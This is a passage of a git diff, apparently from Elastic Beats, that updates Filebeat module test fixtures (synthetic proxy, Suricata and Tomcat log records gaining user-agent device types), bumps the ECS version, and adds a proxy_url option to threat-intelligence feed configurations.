Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -6766,20 +6861,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.net", - "example.com" + "example.com", + "example.net" ], "related.ip": [ - "10.248.156.138", - "10.67.148.40" + "10.67.148.40", + "10.248.156.138" ], "related.user": [ "squamest" ], "rsa.internal.messageid": "OPTIONS", "rsa.misc.action": [ - "deny", - "OPTIONS" + "OPTIONS", + "deny" ], "rsa.misc.content_type": "siuta", "rsa.misc.result_code": "emveleum", @@ -6809,6 +6904,7 @@ "url.top_level_domain": "net", "user.name": "squamest", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -6845,8 +6941,8 @@ ], "rsa.internal.messageid": "UNLOCK", "rsa.misc.action": [ - "UNLOCK", - "accept" + "accept", + "UNLOCK" ], "rsa.misc.content_type": "sum", "rsa.misc.result_code": "oloremq", @@ -6878,6 +6974,7 @@ "url.top_level_domain": "com", "user.name": "eatae", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -6904,8 +7001,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "www5.example.net" + "www5.example.net", + "www5.example.org" ], "related.ip": [ "10.14.29.202", @@ -6949,6 +7046,7 @@ "url.top_level_domain": "net", "user.name": "usmod", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -6975,12 +7073,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.com", - "example.com" + "example.com", + "api.example.com" ], "related.ip": [ - "10.204.223.184", - "10.221.86.133" + "10.221.86.133", + "10.204.223.184" ], "related.user": [ "ptasnul" @@ -6989,8 +7087,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "POST", - "deny" + "deny", + "POST" ], "rsa.misc.content_type": "rerepr", "rsa.misc.result_code": "mcorpor", @@ -7022,6 +7120,7 @@ "url.top_level_domain": "com", "user.name": "ptasnul", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -7052,16 +7151,16 @@ "api.example.org" ], "related.ip": [ - "10.229.39.190", - "10.195.4.70" + "10.195.4.70", + "10.229.39.190" ], "related.user": [ "edictas" ], "rsa.internal.messageid": "PUT", "rsa.misc.action": [ - "deny", - "PUT" + "PUT", + "deny" ], "rsa.misc.content_type": "exeaco", "rsa.misc.result_code": "rmagnido", @@ -7093,6 +7192,7 @@ "url.top_level_domain": "com", "user.name": "edictas", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", diff --git a/x-pack/filebeat/module/suricata/eve/config/eve.yml b/x-pack/filebeat/module/suricata/eve/config/eve.yml index bac91dff1d7..4f290f47525 100644 --- a/x-pack/filebeat/module/suricata/eve/config/eve.yml +++ b/x-pack/filebeat/module/suricata/eve/config/eve.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json index e8f77f9033a..32f58f199c2 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json @@ -81,6 +81,7 @@ "url.original": "/uid/index.html", "url.path": "/uid/index.html", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json index 457a16da86f..b36753a368c 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json @@ -76,6 +76,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -157,6 +158,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -238,6 +240,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -319,6 +322,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -400,6 +404,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -481,6 +486,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -561,6 +567,7 @@ "url.original": "/ubuntu/dists/bionic-security/InRelease", "url.path": "/ubuntu/dists/bionic-security/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -642,6 +649,7 @@ "url.original": "/ubuntu/dists/bionic/InRelease", "url.path": "/ubuntu/dists/bionic/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -723,6 +731,7 @@ "url.original": "/ubuntu/dists/bionic-updates/InRelease", "url.path": "/ubuntu/dists/bionic-updates/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -804,6 +813,7 @@ "url.original": "/ubuntu/dists/bionic-security/main/source/by-hash/SHA256/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72", "url.path": "/ubuntu/dists/bionic-security/main/source/by-hash/SHA256/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -885,6 +895,7 @@ "url.original": "/ubuntu/dists/bionic-security/main/binary-amd64/by-hash/SHA256/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015", "url.path": "/ubuntu/dists/bionic-security/main/binary-amd64/by-hash/SHA256/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -966,6 +977,7 @@ "url.original": "/ubuntu/dists/bionic-security/universe/binary-amd64/by-hash/SHA256/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558", "url.path": "/ubuntu/dists/bionic-security/universe/binary-amd64/by-hash/SHA256/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1047,6 +1059,7 @@ "url.original": "/ubuntu/dists/bionic-backports/InRelease", "url.path": "/ubuntu/dists/bionic-backports/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1128,6 +1141,7 @@ "url.original": "/ubuntu/dists/bionic-updates/main/source/by-hash/SHA256/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03", "url.path": "/ubuntu/dists/bionic-updates/main/source/by-hash/SHA256/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1209,6 +1223,7 @@ "url.original": "/ubuntu/dists/bionic-updates/universe/source/by-hash/SHA256/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef", "url.path": "/ubuntu/dists/bionic-updates/universe/source/by-hash/SHA256/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1290,6 +1305,7 @@ "url.original": "/ubuntu/dists/bionic-updates/main/binary-amd64/by-hash/SHA256/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70", "url.path": "/ubuntu/dists/bionic-updates/main/binary-amd64/by-hash/SHA256/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1371,6 +1387,7 @@ "url.original": "/ubuntu/dists/bionic-updates/restricted/binary-amd64/by-hash/SHA256/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12", "url.path": "/ubuntu/dists/bionic-updates/restricted/binary-amd64/by-hash/SHA256/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1452,6 +1469,7 @@ "url.original": "/ubuntu/dists/bionic-updates/universe/binary-amd64/by-hash/SHA256/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc", "url.path": "/ubuntu/dists/bionic-updates/universe/binary-amd64/by-hash/SHA256/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1532,6 +1550,7 @@ "url.original": "/ubuntu/dists/bionic-updates/universe/i18n/by-hash/SHA256/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4", "url.path": "/ubuntu/dists/bionic-updates/universe/i18n/by-hash/SHA256/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1612,6 +1631,7 @@ "url.original": "/ubuntu/dists/bionic-updates/multiverse/binary-amd64/by-hash/SHA256/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16", "url.path": "/ubuntu/dists/bionic-updates/multiverse/binary-amd64/by-hash/SHA256/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json index 50125bc3f3c..86962b58d98 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json @@ -154,6 +154,7 @@ "url.original": "/dd.xml", "url.path": "/dd.xml", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "user_agent.os.full": "Mac OS X 10.13.5", @@ -215,6 +216,7 @@ "url.original": "/ssdp/device-desc.xml", "url.path": "/ssdp/device-desc.xml", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "user_agent.os.full": "Mac OS X 10.13.5", @@ -586,6 +588,7 @@ "url.path": "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab", "url.query": "111111111111", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Microsoft-CryptoAPI", "user_agent.original": "Microsoft-CryptoAPI/10.0", "user_agent.version": "10.0" @@ -705,6 +708,7 @@ "url.path": "/uuid", "url.port": 8081, "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc index bf278ed270f..772bdda50b2 100644 --- a/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc @@ -120,7 +120,7 @@ should look initially, and optionally any filters used to filter the results. var.input: httpjson var.url: https://SERVER/events/restSearch var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- @@ -142,7 +142,7 @@ reference the MISP fields located on the MISP server itself. var.filters: - type: ["md5", "sha256", "url", "ip-src"] - threat_level: 4 - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- diff --git a/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml index 145dfe246dd..dbca8bb91b4 100644 --- a/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml +++ b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml @@ -8,6 +8,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.transforms: - set: @@ -41,4 +44,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml index e3159060cd8..5fe3a155180 100644 --- a/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml +++ b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml @@ -10,6 +10,7 @@ var: - name: ssl - name: tags default: [threatintel-abusemalware, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml index 96affa7da97..708643e734b 100644 --- a/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml +++ b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml @@ -8,6 +8,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.transforms: - set: @@ -41,4 +44,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml index 155e9b4ff3f..13b5e663c4a 100644 --- a/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml +++ b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml @@ -10,6 +10,7 @@ var: - name: ssl - name: tags default: [threatintel-abuseurls, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/anomali/config/config.yml b/x-pack/filebeat/module/threatintel/anomali/config/config.yml index fd55b6e07c2..a063f6f14f9 100644 --- a/x-pack/filebeat/module/threatintel/anomali/config/config.yml +++ b/x-pack/filebeat/module/threatintel/anomali/config/config.yml @@ -14,6 +14,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.redirect.forward_headers: true request.transforms: @@ -65,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/anomali/manifest.yml b/x-pack/filebeat/module/threatintel/anomali/manifest.yml index b7b87d8fe66..1087e00df8a 100644 --- a/x-pack/filebeat/module/threatintel/anomali/manifest.yml +++ b/x-pack/filebeat/module/threatintel/anomali/manifest.yml @@ -16,6 +16,7 @@ var: default: "https://otx.alienvault.com/api/v1/indicators/export" - name: tags default: [threatintel-anomali, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/misp/config/config.yml b/x-pack/filebeat/module/threatintel/misp/config/config.yml index e28c6c1d9a7..df669cf6a0e 100644 --- a/x-pack/filebeat/module/threatintel/misp/config/config.yml +++ b/x-pack/filebeat/module/threatintel/misp/config/config.yml @@ -8,6 +8,9 @@ request.method: POST {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.body: limit: 100 @@ -71,4 +74,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/misp/manifest.yml b/x-pack/filebeat/module/threatintel/misp/manifest.yml index a39c1fe4496..41443c01df8 100644 --- a/x-pack/filebeat/module/threatintel/misp/manifest.yml +++ b/x-pack/filebeat/module/threatintel/misp/manifest.yml @@ -14,6 +14,7 @@ var: default: "https://localhost/events/restSearch" - name: tags default: [threatintel-misp, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/otx/config/config.yml b/x-pack/filebeat/module/threatintel/otx/config/config.yml index 252c64a21f4..ee5e9e210f3 100644 --- a/x-pack/filebeat/module/threatintel/otx/config/config.yml +++ b/x-pack/filebeat/module/threatintel/otx/config/config.yml @@ -8,6 +8,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} @@ -66,4 +69,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/otx/manifest.yml b/x-pack/filebeat/module/threatintel/otx/manifest.yml index c17efa499e9..0fdefa51d76 100644 --- a/x-pack/filebeat/module/threatintel/otx/manifest.yml +++ b/x-pack/filebeat/module/threatintel/otx/manifest.yml @@ -19,6 +19,7 @@ var: default: "https://otx.alienvault.com/api/v1/indicators/export" - name: tags default: [threatintel-otx, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/tomcat/log/config/input.yml b/x-pack/filebeat/module/tomcat/log/config/input.yml index d8c776349f3..85e40ec455d 100644 --- a/x-pack/filebeat/module/tomcat/log/config/input.yml +++ b/x-pack/filebeat/module/tomcat/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json b/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json index 12ef13d2390..e73c0f86cd2 100644 --- a/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json +++ b/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json @@ -15,9 +15,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "mail.example.net", "example.com", - "https://example.com/illumqui/ventore.html?min=ite#utl", - "mail.example.net" + "https://example.com/illumqui/ventore.html?min=ite#utl" ], "related.ip": [ "10.251.224.219" @@ -53,6 +53,7 @@ "url.top_level_domain": "com", "user.name": "rci", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -76,9 +77,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "https://www5.example.net/mdolo/mqui.htm?sumdo=litesse#orev", "www5.example.net", - "mail.example.com", - "https://www5.example.net/mdolo/mqui.htm?sumdo=litesse#orev" + "mail.example.com" ], "related.ip": [ "10.196.153.12" @@ -115,6 +116,7 @@ "url.top_level_domain": "net", "user.name": "abo", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -137,9 +139,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.com", "internal.example.com", "https://internal.example.com/tetur/idolor.html?ntex=eius#luptat", - "www.example.com", "ctetur5806.api.home" ], "related.ip": [ @@ -179,6 +181,7 @@ "url.top_level_domain": "com", "user.name": "enatus", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -202,9 +205,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www5.example.org/nci/ofdeFin.gif?amco=exe#iatu", "mail.example.com", - "www5.example.org" + "www5.example.org", + "https://www5.example.org/nci/ofdeFin.gif?amco=exe#iatu" ], "related.ip": [ "10.196.118.192" @@ -241,6 +244,7 @@ "url.top_level_domain": "org", "user.name": "tur", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -265,8 +269,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.com", - "internal.example.net", - "https://internal.example.com/aqui/radipis.jpg?llumd=enatuse#magn" + "https://internal.example.com/aqui/radipis.jpg?llumd=enatuse#magn", + "internal.example.net" ], "related.ip": [ "10.246.209.145" @@ -303,6 +307,7 @@ "url.top_level_domain": "com", "user.name": "llu", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -327,8 +332,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.com", - "www5.example.org", - "https://internal.example.com/omnis/antium.txt?lupta=iusmodt#doloreeu" + "https://internal.example.com/omnis/antium.txt?lupta=iusmodt#doloreeu", + "www5.example.org" ], "related.ip": [ "10.114.191.225" @@ -365,6 +370,7 @@ "url.top_level_domain": "com", "user.name": "tempo", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -389,9 +395,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "api.example.com", "https://www5.example.net/uidolore/niamqu.gif?iat=tevelit#nsequat", "www5.example.net", - "api.example.com", "erep2696.www.home" ], "related.ip": [ @@ -431,6 +437,7 @@ "url.top_level_domain": "net", "user.name": "liqu", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -455,8 +462,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.org/idexea/riat.txt?tvol=moll#tatione", "mail.example.org", + "https://www.example.org/idexea/riat.txt?tvol=moll#tatione", "www.example.org", "mUt2398.invalid" ], @@ -497,6 +504,7 @@ "url.top_level_domain": "org", "user.name": "ugits", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -521,8 +529,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.org", - "api.example.org", - "https://api.example.org/toccae/tatno.gif?taliqu=temUten#ccusan" + "https://api.example.org/toccae/tatno.gif?taliqu=temUten#ccusan", + "api.example.org" ], "related.ip": [ "10.182.166.181" @@ -559,6 +567,7 @@ "url.top_level_domain": "org", "user.name": "mol", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -582,8 +591,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.net", "internal.example.com", + "mail.example.net", "https://mail.example.net/atuse/ddoeiu.gif?idolore=onse#liq" ], "related.ip": [ @@ -621,6 +630,7 @@ "url.top_level_domain": "net", "user.name": "quu", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera 